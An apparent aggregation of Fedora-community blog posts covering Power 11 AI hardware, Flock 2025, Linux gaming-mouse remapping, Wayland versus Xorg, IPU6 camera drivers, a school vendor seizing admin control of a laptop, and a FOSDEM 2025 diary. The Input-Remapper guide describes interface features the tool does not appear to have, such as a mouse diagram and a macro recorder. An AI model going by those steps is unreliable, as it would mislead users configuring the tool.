During CES Nvidia announced a new AI desktop supercomputer: Project DIGITS. Starting at $3000 it puts AI processing capabilities on the desktop what just recently needed multiple servers and a few more zeroes at the end of the price tag.
As an IBM Champion for POWER my first thought was that Project DIGITS is nice, but I’d love to see something based on POWER. Of course it’s just a game of thoughts, as IBM left the workstation business many years ago, both for x86 and POWER. So, even if I had some ideas, I did not care much about them. However, at FOSDEM someone described almost the same dream AI system. It means that I’m not alone, and it’s worth sharing this idea :-) And, of course, even if it is never implemented as a workstation, the technologies are interesting to learn about.
POWER 10 already has some extra instructions related to AI, making it efficient at AI tasks even without using a GPU. You can read more about it in the IBM blog at https://developer.ibm.com/blogs/run-ai-inferencing-on-power10-leveraging-mma/. Power 11 is coming this year, and will be include these instructions while being both faster and more energy efficient.
At IBM it’s not just Power CPUs when it comes to AI. They are also working on a dedicated AI accelerator card, called Spyre. I’m an environmental engineer by degree, so I very much appreciate IBM’s approach here. They focus on energy efficiency. If a single card does not provide you with enough processing capabilities, you can use multiple easy to cool cards, which also helps to reduce hardware failure rates.
After all this introduction I guess you could figure out our idea: a Power 11 + Spyre AI accelerator workstation. Just the smallest Power 11 CPU coupled with a single Spyre AI accelerator card and an entry level graphics card, all nicely packed in a well sealed silent case. The GPU here is just to drive the screen, not for AI. It could lower the entry barrier to AI on Power, and make developers more passionate about their jobs.
Why a workstation, and why do I mention passion? Having a workstation is not a requirement to develop for an architecture. However, I know from talking to people at FOSDEM, many other conferences or on-line, that most developers have more passion working on things on a machine on / under their desk. In the open source world, many important developments are born due to passion, in spare time, even by paid developers. Having a Power workstation with AI also could help in keeping POWER relevant in the open source world.
Great news, Fedorans! As the month of February is moving at warp speed, we have decided to extend the CFP for Flock to Fedora until Monday, March 3rd. The submission site will automatically close at 23:59 UTC, so you still have some time to send us your proposals for this years event. Read on for some helpful links, a reminder of the themes and some general information about Flock this year.
This year Flock to Fedora will take place in the stunning historic city of Prague, Czechia. We have secured the Vienna House by Wyndham, Anděl in Prague to host three great days of conference programming from June 5 to June 7, plus we will continue our new/old tradition of having an informal social day on June 8 for those wanting to connect with Friends outside of the conference and enjoy Prague. More details to come on the plans for this date
Our Call for Papers for Flock is remaining open until 23:59 on Monday, March 3rd, so if you have a talk or workshop or BoF idea that fits our themes, you still have time to submit it! Also, to help our themes resonate with our community more, we created an ideas and tips blog post that gives some general examples of how you could interpret each theme and relate it to your work or something you are passionate about in Fedora.
Our themes this year are:
Empowering Collaboration: Tools and Practices for Fedora’s Future: Dive into the tools, workflows, and practices that enable Freedom and Features in the Fedora Project. Topics may include the upcoming Git forge change, discussion related to bug tracking systems, communication platforms, and project management that drives Fedora’s collaborative efforts.
Welcoming New Voices: Pathways for Fedora Contributors: Grow our community of Friendship with an inclusive and welcoming space for new contributors. These workshops will focus on beginner-friendly, hands-on sessions to introduce newcomers to Fedora and help them make meaningful contributions.
Driving Innovation: Fedora and Emerging Technologies: Embrace First by exploring the technologies shaping Fedora’s future. Topics related to IoT, containers, AI/ML, edge computing, RISC-V, and other advancements that align with Fedora’s commitment to innovation.
You can find out more details about the event from the Flock to Fedora Website and Fedora Magazine article, and you can secure your ticket now through our early registration link. For those wondering about accomodation, we have secured a room block with the event hotel, however we will be prioritizing confirmed speakers who require travel assistance for this block. We recommend the NH Prague City or the OREA Hotel Angelo Praha for those who would prefer to confirm their hotel stay for Flock early, as we understand that hotels are usually at better rates the more in advance you can book.
And finally, some dates that you can expect to hear back from us by on your submission! We hope to have all proposals reviewed by March 15, with final selections completed by our panel by March 20. So you can expect to hear from us from the week beginning March 23rd onwards on the status of your submission. We hope to see as many of you in Prague in June, and make sure to join our Flock to Fedora room on Matrix too to get early info, ask questions and connect with other event goers and organizers!
One thing that came up when discussing the Open Source Project Security Baseline with a colleague was the distinction between software projects and other projects (design, documentation, etc). Mike astutely pointed out that every project is a software project in some sense. Whether or not the project is producing software, it is consuming software: applications, git forges, issue trackers, and so on.
The specific context of our conversation was supply chain security. Projects that don’t produce a single line of code can still be the victim of supply chain attacks.
Then again, it’s pretty rare that a project doesn’t produce a single line of code. Even if a project exists to write documentation, create visual art, or do something else that isn’t producing a piece of software, there’s probably at least some tooling it has created to make life a little easier. Fedora Magazine, for example, has a small script for converting SVG files to JPG.
It’s a good reminder that our audience is broader than we might think and we should act accordingly.
Gaming on Linux has come a long way, and with tools like Input-Remapper, you can finally unleash the full potential of your gaming mouse. This powerful application, considered by many to be the best solution for GNOME on Wayland, allows you to customize your mouse buttons and even create complex macros, giving you a competitive edge in your favorite games. This guide will walk you through installing and using Input-Remapper to bind your gaming mouse keys on your Linux desktop.
Why Remap Your Mouse Keys?
Before we dive into the how-to, let’s discuss why you might want to remap your mouse keys in the first place:
Enhanced Control: Many games don’t utilize all the buttons on modern gaming mice. Re-mapping allows you to assign in-game actions to these unused buttons for quicker access to crucial commands.
Macros and Combos: Execute complex sequences of keystrokes with a single button press. This is incredibly useful for MMOs or games with intricate combo systems.
Accessibility: Remapping can make gaming more accessible for users with disabilities, allowing them to customize controls to suit their needs.
Productivity Boost: Beyond gaming, remapping can streamline your workflow in other applications by assigning common tasks to your mouse buttons.
Consistency Across Games: Create a unified control scheme for all your games, reducing the learning curve when switching between titles.
Installing Input-Remapper
Input-Remapper is available on various Linux distributions. The recommended method is usually through your distribution’s package manager. Here’s a general overview:
Debian/Ubuntu-based distributions:
Bash
sudo apt update
sudo apt install input-remapper
Fedora/RPM-based distributions:
Bash
sudo dnf install input-remapper
Arch-based distributions:
Bash
sudo pacman -S input-remapper
If your distribution doesn’t have Input-Remapper in its repositories, you can usually build it from source. Refer to the official Input-Remapper GitHub page (https://github.com/sezanzeb/input-remapper) for detailed instructions.
Configuring Input-Remapper
Once installed, launch Input-Remapper. You’ll be greeted with a user-friendly interface. Here’s a breakdown of the key elements:
Device Selection: Choose your gaming mouse from the list of connected devices. Make sure it’s properly detected.
Button Mapping: This is where the magic happens. You’ll see a visual representation of your mouse with clickable buttons.
Action Assignment: When you click a button, you can assign various actions to it:
Keypresses: Simulate pressing any key on your keyboard, including combinations (e.g., Ctrl+Shift+T).
Macros: Record and playback sequences of keystrokes and mouse clicks.
Special Actions: Input-Remapper also offers some special actions, like adjusting volume or launching applications.
Step-by-Step Guide to Remapping a Mouse Button
Let’s walk through a simple example of remapping a side button on your mouse to simulate the “G” keypress:
Select Your Mouse: Open Input-Remapper and select your gaming mouse from the device list.
Identify the Button: Click on the visual representation of your mouse to identify the button you want to remap. Input-Remapper should highlight the corresponding button on your physical mouse.
Assign the Action: Click on the selected button in Input-Remapper. A dialog box will appear allowing you to choose the action.
Choose “Keypress”: Select the “Keypress” option.
Enter the Key: Type “G” into the key input field.
Save the Configuration: Click “Save” to apply your changes.
Now, when you press the remapped button on your mouse, it will be as if you pressed the “G” key on your keyboard.
Creating Macros
Macros are where Input-Remapper truly shines. Here’s how to create one:
Select the Button: Choose the button you want to assign the macro to.
Choose “Macro”: Select the “Macro” option.
Record the Sequence: Click “Start Recording” and perform the sequence of keystrokes and mouse clicks you want to include in the macro.
Stop Recording: Click “Stop Recording” when you’re finished.
Save the Macro: Give your macro a name and save it.
Now, pressing the assigned button will execute the entire recorded sequence.
Tips and Tricks
Profiles: Create different profiles for different games or applications. This allows you to quickly switch between control schemes.
Modifiers: Use modifier keys (Ctrl, Shift, Alt) in your key mappings and macros for even more complex actions.
Testing: Always test your remappings in-game to ensure they work as intended.
Troubleshooting: If a button isn’t working, double-check that you’ve selected the correct device and button in Input-Remapper. Also, make sure the application has the necessary permissions to access your input devices. Restarting Input-Remapper or even your computer can sometimes resolve issues.
Community Resources: The Input-Remapper GitHub page and community forums are excellent resources for finding help and sharing your configurations.
Beyond Gaming
While this guide focuses on gaming, remember that Input-Remapper can be used for a wide range of tasks. Think about how you can streamline your workflow in other applications by assigning common actions to your mouse buttons.
Conclusion
Input-Remapper is a powerful tool that can significantly enhance your gaming experience on Linux, especially on GNOME with Wayland. By following this guide, you can unlock the full potential of your gaming mouse and take your skills to the next level. So, go ahead, experiment, and customize your controls to dominate your favorite games!
One Identity Active Roles allows you to easily and securely manage Active Directory (AD), Entra ID and M365 Identity objects. While Active Roles stores its log messages into Windows Event Log, most log management and log analytics applications expect to receive log messages over the syslog protocol. This is where syslog-ng Premium Edition (PE) can help you. The syslog-ng Windows Agent can collect and forward Active Roles log messages from Windows Event Log, while the syslog-ng server can collect, process, store and forward Active Roles log messages to multiple destinations.
Installing syslog-ng PE together with Active Roles has many advantages, one of which is central log collection. This means that you do not have to log in to individual hosts to check logs, but instead can view logs from every host in a single location. This also enhances security, as logs are available even when they disappear from the original location due to a hardware failure or security incident.
From this blog, you can learn how to configure the syslog-ng Windows Agent to collect and forward Active Roles log messages from Windows Event Log, and how to parse and store the incoming log messages on the syslog-ng server side.
My journey in #selfhosting continues. On a #VPS running #Fedora I decided to self-host a photo management solution. I opted for #Immich. It works very well, even on a low end #VPS. Face recognition impressed me.
I installed it using #Podman.
I used the provided Docker compose file. Well, I adapted it a bit, also using podlet.
For decades, Xorg has been the dominant display server for Linux and other Unix-like operating systems. It’s the foundation upon which our graphical interfaces have been built. However, a new contender has emerged: Wayland. This modern display server is designed to address some of Xorg’s limitations and offer a more secure and efficient experience. But the transition hasn’t been without its challenges. This blog post delves into the key differences between Wayland and Xorg, exploring their respective pros and cons, and also highlighting some common problems users might encounter.
Understanding the Basics:
Before diving into the specifics, let’s clarify what a display server actually does. It acts as the intermediary between your hardware (graphics card, monitor, input devices) and your software (window manager, desktop environment, applications). It’s responsible for managing everything you see on your screen and how you interact with it.
Xorg: The Veteran Warrior:
Xorg has a long and storied history, evolving from the original X Window System. Its longevity has resulted in a mature and feature-rich system, supporting a wide range of hardware and software.
Pros of Xorg:
Compatibility: Xorg boasts excellent compatibility with virtually all hardware and software, including older and less common devices. This is its biggest strength.
Mature Ecosystem: Years of development have resulted in a robust and well-documented system. Numerous tools and utilities are available for Xorg.
Feature Rich: Xorg offers a wide range of features and extensions, catering to various use cases.
Remote Access: X11 forwarding, while complex, is a well-established method for remote access.
Cons of Xorg:
Security Vulnerabilities: Xorg’s architecture has inherent security vulnerabilities, making it susceptible to exploits. Its client-server model can allow one application to snoop on or even control others.
Performance Issues: Xorg’s architecture can lead to performance bottlenecks, especially with modern hardware and demanding applications. It relies heavily on the X server for rendering, which can be inefficient.
Complex Codebase: Xorg’s codebase is large and complex, making it difficult to maintain and develop. This complexity also contributes to security concerns.
Limited Hardware Acceleration: While Xorg supports hardware acceleration, its implementation can be less efficient and reliable compared to Wayland.
Common Xorg Problems:
Screen Tearing: Xorg is prone to screen tearing, especially when using compositors that don’t properly handle vsync.
Input Lag: Input lag can be noticeable in Xorg, particularly in demanding applications or with certain hardware configurations.
Configuration Complexity: Configuring Xorg can be complex, requiring manual editing of configuration files.
Driver Issues: Xorg often relies on complex and sometimes buggy graphics drivers, which can lead to instability and crashes.
Wayland: The Modern Challenger:
Wayland is a modern display server designed to address the shortcomings of Xorg. It takes a more direct and streamlined approach, aiming for better performance, security, and maintainability.
Pros of Wayland:
Improved Security: Wayland’s architecture is inherently more secure than Xorg’s. It isolates applications from each other, preventing one application from interfering with others.
Enhanced Performance: Wayland’s direct rendering model can lead to significant performance improvements, especially with modern hardware and demanding applications like games.
Simplified Architecture: Wayland’s codebase is cleaner and more modern, making it easier to maintain and develop.
Better Hardware Acceleration: Wayland is designed to leverage modern hardware acceleration capabilities more effectively.
Modern Design: Wayland is designed with modern hardware and software in mind, addressing the limitations of Xorg’s aging architecture.
Cons of Wayland:
Compatibility Issues: Wayland’s biggest challenge is compatibility. Some older applications and hardware may not work correctly or at all under Wayland. This is improving over time, but it remains a concern for some users.
Missing Features: While Wayland is rapidly evolving, it still lacks some features that are available in Xorg. However, many of these are being addressed through extensions like wlroots.
Fragmented Ecosystem: The Wayland ecosystem is still relatively fragmented, with different compositors (like GNOME’s Mutter and KDE’s KWin) implementing Wayland in their own ways. This can lead to inconsistencies and compatibility issues.
Remote Access: Remote access with Wayland is more complex and less mature than X11 forwarding with Xorg. While solutions like RDP and Wayland-native protocols are emerging, they are not as widely adopted.
Common Wayland Problems:
Application Compatibility: As mentioned, some applications, especially older ones or those relying on X11-specific features, might not work correctly under Wayland.
Screen Recording/Sharing: Screen recording and sharing can be more challenging under Wayland, as it requires specific protocols and support from the compositor.
Input Device Issues: Some users might experience issues with input devices, such as mice and keyboards, particularly with specialized or gaming peripherals.
Window Management Inconsistencies: Due to the fragmented ecosystem, window management behavior can vary between different Wayland compositors.
Driver Issues (again): While Wayland aims to simplify things, driver issues can still arise, especially with newer or less common hardware. Sometimes, it’s a different set of driver issues compared to Xorg, as Wayland uses a different rendering path.
The Transition and the Future:
The transition from Xorg to Wayland is an ongoing process. While Wayland has made significant strides, it still has some hurdles to overcome before it can completely replace Xorg. Compatibility issues are gradually being resolved, and new features are constantly being added.
For many users, especially those with modern hardware and primarily using well-maintained applications, Wayland offers a superior experience in terms of performance and security. However, users relying on older software or hardware might still need to stick with Xorg for the time being.
The future of display servers likely belongs to Wayland. As it matures and its ecosystem expands, it is poised to become the standard for Linux and other Unix-like systems. While Xorg will likely remain relevant for some time due to its compatibility, Wayland’s modern architecture and focus on security and performance make it the clear choice for the future of desktop graphics. The battle continues, but Wayland is steadily gaining ground.
So, which is best for you? It depends. If you’re a user who values cutting-edge performance, enhanced security, and have mostly modern software, Wayland is likely the better choice. You’ll experience smoother visuals, potentially better gaming performance, and a more secure environment. However, if you rely on older applications, specialized hardware, or require features not yet fully implemented in Wayland, Xorg might still be the more practical option for now. The best approach is to experiment! Try Wayland on your system and see if it meets your needs. If you encounter issues, switching back to Xorg is usually straightforward. Ultimately, the “best” display server is the one that works best for your specific use case.
Following the discussion during the recent Fedora Council F2F on Fedora-Council#502 , the council would like to approve a new policy to set some DEI criteria for potential locations to meet when choosing where we hold our large-scale community events such as Flock. The objective behind this proposal is to make sure we have a governance structure in place to later propose some more specific rules for event location selection. The proposal has two parts: the policy itself, which proposes criteria we would like to use, and then formalize some rules to adhere to when deciding on a location. The rules will be submitted later in a separate proposal.
In order to approve this policy, we are using the policy change policy framework. By policy, this proposal is now open to our community discussion for a period of two weeks, after which the Council will hold a formal vote. The vote will come into effect on March 12th. The full proposal is available from Fedora-Council#502 and council-docs#234 , and discussion is welcome on the discourse thread.
A special thanks to our DEI team who have spent a considerable amount of time creating this well thought out policy.
I recently needed a new laptop at work. Being quite content with my former 7390, I went ahead and ordered just another in the row without looking very closely at the specs, nor checking the small print. Which is something that you should not do. The good: The XPS 13 9340 has excellent speed, a…More
I have been working on getting the camera on the ThinkPad X1 Carbon Gen 12 to work under Fedora.
This requires 3 things:
Some ov08x40 sensor patches, these are available as downstream cherry-picks in Fedora kernels >= 6.12.13
A small pipewire fix to avoid WirePlumber listing a bunch of bogus extra "ipu6" Video Sources, these fixes are available in Fedora's pipewire packages >= 1.2.7-4
I2C and GPIO drivers for the new Lattice USB IO-expander, these drivers are not available in the upstream / mainline kernel yet
I have also rebased the out of tree IPU6 ISP and proprietary userspace stack in rpmfusion and I have integrated the USBIO drivers into the intel-ipu6-kmod package. So for now getting the cameras to work on the X1 Carbon Gen 12 requires installing the out of tree drivers through rpmfusion. Follow these instructions to enable rpmfusion, you need both the free and nonfree repos.
Then make sure you have a new enough kernel installed and install the rpmfusion akmod for the USBIO drivers:
The latest version of the out of tree IPU6 ISP driver can co-exist with the mainline / upstream IPU6 CSI receiver kernel driver. So both the libcamera software ISP FOSS stack and Intel's proprietary stack can co-exist now. If you do not want to use the proprietary stack you can disable it by running 'sudo ipu6-driver-select foss'.
After installing the kmod package reboot and then in Firefox go to Mozilla's webrtc test page and click on the "Camera" button, you should now get a camera permisson dialog with 2 cameras: "Built in Front Camera" and "Intel MIPI Camera (V4L2)" the "Built in Front Camera" is the FOSS stack and the "Intel MIPI Camera (V4L2)" is the proprietary stack. Note the FOSS stack will show a strongly zoomed in (cropped) image, this is caused by the GUM test-page, in e.g. google-meet this will not be the case.
I have also been making progress with some of the other open IPU6 issues:
Camera's failing on Dell XPS laptops due to iVSC errors (rhbz#2316918, rhbz#2324683) after a long debugging session this is finally fixed, the fix for this will be available in Fedora kernels >= 6.13.4 which should show up in updates-testing today
This is a weekly report from the I&R (Infrastructure & Release Engineering) Team. We provide you both infographic and text version of the weekly report. If you just want to quickly look at what we did, just look at the infographic. If you are interested in more in depth details look below the infographic.
Week: 17-21 Feb 2025
Infrastructure & Release Engineering
The purpose of this team is to take care of day to day business regarding CentOS and Fedora Infrastructure and Fedora release engineering work. It’s responsible for services running in Fedora and CentOS infrastructure and preparing things for the new Fedora release (mirrors, mass branching, new namespaces etc.). List of planned/in-progress issues
I spent fifteen years running the IT infrastructure for a relatively large (1600+ student) school, so I understand that it can be a really thankless task. Because of this, I have done what I can to work with my kids’ school and their device policies. I trust that the people in the school are doing things with the best intentions, but earlier this month my trust in the school was severely shaken when I discovered that my son’s laptop had been compromised… by the school’s IT vendor!
To give some background, when my second daughter moved up to secondary school (the Irish equivalent of junior high and high school combined) a few years ago, hers was the first class to be asked to buy laptops that would be used in place of physical books. The school was very specific that the laptops be a certain model and have a specific version of Windows installed on them. An opportunity was provided to buy the laptops through Wriggle, an Irish IT company that the school used to manage this process. Wriggle sweetened the pot by offering three years of support and promising that the laptops would be securely locked down so students wouldn’t be able to access inappropriate websites, etc.
The thing is, I am not going to entrust my childrens’ IT security to random third parties. While I’m sure that Wriggle provides a useful service for the vast majority of the population, it’s not useful for me, and I really appreciate that the school didn’t mandate buying the laptop through Wriggle. I bought the laptop externally with the required version of Windows and allowed the school to install MS Office and their ebook software onto it. I then joined the laptop to my Microsoft Family Safety account, and set up screen time limits and sane web security and application limits. This worked fine for the last couple of years. The laptop ran into the usual Windows problems, but nothing out of the ordinary, and was reliable enough for my daughter to get her classwork done.
Last September, my son started secondary school and I went through the same process again. This time the spec was for a much nicer system, and, once again, I purchased the laptop externally, joined it to my Microsoft Family Safety account, and set up all the necessary security configuration before sending him to school to have them to install MS Office and their ebook software. I never heard any complaints, so I assumed everything was fine.
At some point earlier this month, I noticed that I hadn’t received any of the Microsoft Family Safety emails for my son’s laptop in months, so I decided to take a look at his laptop. Imagine my surprise when I went to the login screen to see two users, his own and a… wriggle24 user? No, make that a wriggle24administrator?! He then logged into his account and a message popped up saying that Microsoft Family Safety was disabled due to the group policies put in place by the administrator. And, to top it off, TeamViewer (a remote access tool, commonly used for support) had been installed! In other words, a new admin had been created on the laptop, all of the restrictions that I had setup had been disabled, and remote access to the laptop had been set up, all without my knowledge!
Now, I do want to be clear that I don’t think this was done maliciously by either the school or Wriggle. My suspicion is that Wriggle has provided the school with a script of some kind and said that if anyone’s laptop wasn’t set up correctly, they should just run the script. This is entirely legitimate… if the laptop is managed by Wriggle. The failure here is that Wriggle took control of my son’s laptop, even though his was not a Wriggle-managed laptop. This is a major breach of trust! I intentionally purchased the laptop outside of Wriggle to ensure that I had control, and that control was usurped without my consent. Even worse, this was done without even informing me!
This was completely unacceptable, so I informed the school that I was re-establishing control of both of my kids’ laptops, and then took the somewhat extreme step of wiping Windows and installing Fedora Silverblue on them instead. It turns out that the school’s ebooks are all available online, so my kids are using the online versions of the books. And the MS Office web applications work just as well as the Windows versions, so they haven’t had any document compatibility issues. Aside from the learning curve that comes with switching from Windows to Fedora, there have been two main issues:
Flatpaks and printing. Why is it so hard? Chrome is unable to print anything, so the kids are having to “Save to PDF” and then print the PDF using document viewer.
My son gets homework in the form of a PDF that he’s supposed to fill in using the laptop’s digitizer. I started him with Inkscape, but it’s UI is really complex and he’s looking for something as simple as MS Paint. There are plenty of simpler offerings out there on Flathub, but the main feature he’s looking for is that the eraser restores the original PDF rather than leaving a white background, and none of the simple options offer that functionality.
So what have I taken away from this? First, Wriggle needs to have safeguards against taking control of devices not purchased through them. There should be no way that their configuration ends up on a laptop not purchased through them, if for no other business reason than it’s not in their interest to waste their resources supporting non-Wriggle devices.
Second, schools need to think carefully about how they provide student hardware. While I completely understand the desire for standardized hardware, there’s a danger of conflict of interest in pushing parents to purchase hardware through the same vendor that provisions the software required for the school. If nothing else, they need to ensure that there’s a process for getting the school’s required software onto laptops not purchased through the hardware vendor without giving control of the laptop to the hardware vendor.
Finally, as a parent, I will not be allowing the school or its proxies to manage my kids’ laptops. When my last child reaches secondary school, his laptop will have Fedora on it from the first day, and, if that requires more work on my side to ensure it does what he needs, that’s a small price to pay for the peace of mind.
One can stay starved for a very long time but the moment you withdraw sleep and hydration from them, you can watch them fall apart quickly. While I could not quite claim that I was at the top of my resting game then, I did ensure that I had adequate water intake. That along with some painkillers helped me rise as early as 0600am European Standard Time on the second day of FOSDEM 2025. By the end of the previous day, I realized that I pushed my feet too much and I could use some recovery. Thankfully, I volunteered to help out with organizing the FOSDEM 2025 edition of Distributions Devroom which meant that I did not have to keep standing at our booth. After getting freshened up, I decided to skip on the breakfast on that day as I was still feeling full with the dinner meal that I had the previous night.
From left to right - Luis, Sumantro, Fernando and myself basking in the glory of having set things up at our FOSDEM 2025 booth
The other half of the reason why I did not want to overwhelm my biological system was because as one of the Distributions Devroom organizers, I had to keep myself moving. The mobility might be either to pass a microphone around to attendees when they have questions or to ensure that the decorum is maintained in the hall. Curiously enough, my fitness tracking application mentioned that I had covered somewhere around ten kilometers throughout the day. While it was mostly pacing through various buildings in the ULB Solbosch Campus, it indeed felt a lot. With no respite for my poor feet in sight then, I headed downstairs to the reception area to meet with Greg Sutcliffe and Sumantro Mukherjee. We were soon joined by Luis Bazan and Fernando Fernandez Mancera who told us that our van had arrived.
Antonio Alvarez Feijoo and James "Chewi" Le Cuirot delivering talks on Mkosi-Initrd Network Booting and Flatcar Linux respectively
At around 0820am European Standard Time, Greg suggested that we leave for the ULB Solbosch Campus as Justin W. Flory had not arrived by the agreed upon time. As Sumantro and I were assigned the earlier slots of the Distributions Devroom organizing duty, we agreed to the decision. It was only after we boarded the van that we realized that the driver required a PIN which was available with Justin as he booked the van. Luis volunteered to reach out to him on his phone and after we heard back the PIN from a half-awake Justin, we departed for the event venue. The five of us marched up to Building K to help reestablish our booth for the second day. I risked being a bit late to the Distributions Devroom as we were weakly staffed in the morning and the booth could use some help in the setting up process.
Mikel Olasagasti & Daniel Mellado and Marcel Ziswiler delivering talks on Rust RPM Packaging and Fedora Silverblue Disk Encryption respectively
While Fernando and Luis left to bring our supplies from the locker area, Sumantro and I worked on setting up the CentOS Project standee beside the Fedora Project standee. Tomas Hrcka who was at the booth then left with Greg for a coffee run and I decided to reach out to the Distributions Devroom's organizer discussions channel to notify them about my delay. I had to consign my coffee to Luis when I got to know that Jonathan Wright, who was also assigned the same slot with me and Sumantro was just about to leave for the event venue and was at least about at least thirty minutes out. After setting things up at our booth while Tomas and Greg were away and ensuring that we had at least four attendants present, Sumantro and I rushed to Hall H1302 in Building H for our Distributions Devroom duties.
Frantisek and Troy delivering talks on Packit on Fedora Linux & OpenSUSE Linux and The SIGs of CentOS Stream respectively
By the time I got to the hall at around 0915am Central European Time, the first talk on Networking Booting Using Mkosi-Initrd by Antonio Alvarez Feijoo had already begun. After briefly meeting up with Shaun McCance and Benny Vasquez, I started helping out with the event photography along with the door duties while Sumantro was handling the livestream camera. After some discussion in the organizer channels, we decided to keep both doors available for usage unless the crowd was unmanageable. We had attendees joining and leaving in between but somehow the seats and doors were not as noisy as those from the hall assigned to us in the previous edition of Distributions Devroom. Jonathan soon joined us at around 0945am Central European Time and started taking care of the door duty.
Having sunshine during FOSDEM is probably harder than finding a needle in a haystack
From left to right - Julia, Carl, myself, Jonathan and Sumantro at the entrance of Hall H1302
At around 1100am Central European Time, Frantisek Lachman started with his talk on Packit on Fedora Linux and OpenSUSE Linux. While he was supposed to deliver this presentation with Dan Cermak, he had to continue by himself as Dan was unavailable. With the change of talks, the micrunning duty also changed over from Chris to me and I had to take care of making the microphone available to the audience members asking questions. Chris' act of stepping up in Justin's stead to handle the micrunning duty during his unavailability was commendable. After briefing me about the microphone toggle, he left to take care of our booth in Building K as Fernando notified in the communication channel about them being critically understaffed with only Luis and him taking care of the flagship crowd.
Is it true that the waffles taste best when they are warm and when you are cold?
Some glimpses of how populated the event venue was throughout the day
Michael and I shared some conversations about the situation around the use of artificial intelligence in the Fedora Project community, the introduction of a new build system and its inclusion in the established release engineering workflow, and many other things. At around 0200pm Central European Time, we came across Justin who was on his way to Building K and we were seated right in front of it. Offering Michael to Justin in exchange for a Chicken Sandwich from him, I went into Building K to check with our booth attendees. I decided to hang around for a while with Sumantro and Luis while finishing off lunch when I also met up with Jona Azizaj who had arrived then. As the clock was gradually moving towards 0300pm Central European Time, Sumantro and I decided to head back to the hall.
Some glimpses of the Fedora Project, CentOS Project and Red Hat swags we had available on our booth (Courtesy. Luis Bazan CC-BY-SA 4.0)
I would have loved to stay back at our booth but I had myself up for the emcee duty from 0300pm Central European Time onwards so I had to be present there. After catching up with the tail end of Carlos Melara's talk on Fixing CVEs on Debian, I met up with Fabian Arrotin who passed over the emcee duty to me. I started with introducing Emmanuel Rocca who was delivering a talk on Enabling Architectural Features In Debian at around 0300pm Central European Time. For presentations that were finished before the scheduled time, I made it a point to deliver some poorly written yet rollingly hilarious jokes and puzzles around GNU/Linux Distributions. It did not go badly for me doing so for the first time even though I am certain that I do not have a bright career as a standup comedian any time soon.
Some glimpses of some amazing Fedora Project and CentOS Project contributors attending to the booth visitors in the hustle and bustle of Building K (Courtesy. Luis Bazan CC-BY-SA 4.0)
While the initial reception to my jokes was lukewarm, it gradually began a whole lot better once we were a couple of presentations in. At around 0330pm Central European Time, I decided to head back to take a seat after introducing Oren Klopfer and Adam Salt's talk on Rhino Linux and Pacstall as my legs were hurting again. The succeeding talk from Athos Ribeiro on The Ubuntu Patch Pilot Program faced some issues as their device was not recognizing the HDMI cable. I decided to lend my laptop for the purpose - a gesture that they were appreciative of. We also did not lose time as the previous talk finished before the decided time so there was enough time to help the speaker with the collar microphone. I took a seat with Sudhir Dharanendraiah at around 0415pm Central European Time.
Andrew Lukoshko and Jelle van der Waa, Holger Levsen & Kpcyrd delivering talks on AlmaLinux From Manul To Kitten and Reproducible Builds respectively
In the brief conversation that I shared with Sudhir, he mentioned about how my wisecracking as an emcee helped awkward moments in between presentations as we did not have the liberty to start the next talk before the scheduled time. Even though, we were well equipped to do so - we could not compromise the audience joining, both, in-person and remotely and hence, the fillers were helpful. While Shaun took care of the micrunning duties for a previous couple of talks, I played the dual role of emcee and micrunner at the tail end of the day. Right before the last talk of the day began, I decided to finish with a programming-related puzzle about the reason why a programmer decided to keep a couple of glasses beside his bed - one empty and one full - received well by the lively audience in the hall.
Emanuele Rocca and Oren Klopfer & Adam Salt delivering talks on Enabling Architectural Features In Debian and Rhino Linux respectively
As we had somewhere around ten minutes to spare before the last talk of the day began, we passed the microphone around the room for folks to answer. Amidst a bunch of mistaken answers, one person answered the puzzle correctly by stating that the purpose of the filled glass was for if the programmer was thirsty and that of the empty glass was for if the programmer was not. With a huge round of applause for the winner and for the next speaker, Jorge Gomez, talking on Understanding And Contributing To Immutable Linux Distributions at around 0430pm Central European Time - I left to purchase some waffles for the winner. As I had promised the prize to the winner, it was only fair that I honoured the arrangement by bringing waffles from the foodvans in the ULB Solbosch Campus.
Athos Ribeiro and Jorge Gomez delivering talks on The Ubuntu Patch Pilot Program and Immutable Linux Distributions respectively
In a brief interaction with Jorge, I got to know how he was using an Emacs suite as his presentation software of choice which I found to be enticing. With the last talk finishing and a round of questions being asked, it was finally the wrapping up time for the FOSDEM 2025 edition of Distributions Devroom. The lack of a closing note stung hard because that was the 25th edition of the Distributions Devroom - an occasion I considered worth observing for one of the oldest developer rooms in the history of FOSDEM. Following the conversations in our communication channels, I headed back to Building K with Sumantro where we planned on gathering together for a group photograph of the Fedora Project, CentOS Project and Red Hat attendees at FOSDEM 2025 at around 0515pm Central European Time.
How many free and open source software community contributors does it take to tear down a FOSDEM 2025 booth? (Courtesy. Luis Bazan CC-BY-SA 4.0)
After sharing some conversations with Carl, Fabian and Greg and contemplating whether folks plan to go to GitHub Maintainer Social 2025 in the evening, Greg and I decided not to wait for the shared Uber van. Like the previous evening, we realized that we could use some rest before the evening activities and thankfully, the buses were not as crowded as before. With some plans made to meet later in the lobby in the evening once we made it to the Moxy Brussels City Center hotel, Greg and I departed to our respective rooms. I got in touch with Sumantro and Sudhir to discuss the plans for meeting in the evening and we agreed upon meeting Sudhir near his hotel and taking a cab from there to Grand Place. At around 0730pm Central European Time, we met up near a metro station for a pickup.
Folks from the Fedora Project, CentOS Project, Red Hat and GNOME Foundation coming together for a commemorative FOSDEM 2025 photograph
At Grand Place, we spent roughly an hour lounging around, browsing various shops and clicking pictures with each other. The place was a lot more livelier than the last time we visited it a couple of days before when it was vacant due to the worsening drizzle. I also got some time to visit the anime shop again that I visited with Sumantro before and decided to give in to the desire to purchase all the metal plates from the Spy X Family franchise. I was lucky enough to make it there then as the store was one of the few ones open on a Sunday evening and was about to close when we entered. Sumantro and I gave a quick tour of the culture around Manga and Anime to Sudhir on our way to the Delirium Village for beers - as after all, you can never have enough of those when you visit Brussels during winter.
From left to right - Sumantro, Sudhir and myself at Grand Place
The three of us had a brief meeting with Artur Frenszek-Iwicki at the entrance before settling down at the back of the Delirium Cafe. With a bunch of catching up in conversations, we were soon joined by Artur again was tired of waiting on his friends. After finishing off our beers at around 0830pm Central European Time, we bade farewell to Artur and headed out looking for dinner restaurants. One funny incident that I get reminded of was the presence of haggling attendants in front of a bunch of these restaurants that we turned a deaf ear to being habituated to a similar treatment back home. While the beers did help with the cold to some extent, we had to find a restaurant quickly as the weather was growing colder by the passing second and we did not want to stay out for any longer than we had to.
From left to right - Artur, Sumantro, Sudhir and myself nearly done with our drinks and about to leave the Delirium Cafe
